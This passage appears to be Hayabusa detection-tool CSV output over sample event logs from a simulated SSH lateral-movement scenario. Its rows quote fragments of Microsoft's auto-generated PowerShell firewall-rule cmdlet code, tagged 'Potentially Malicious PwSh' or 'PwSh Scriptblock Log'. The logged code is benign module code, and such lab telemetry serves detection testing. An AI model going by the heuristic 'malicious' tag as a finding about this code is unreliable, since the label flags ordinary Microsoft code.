'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] 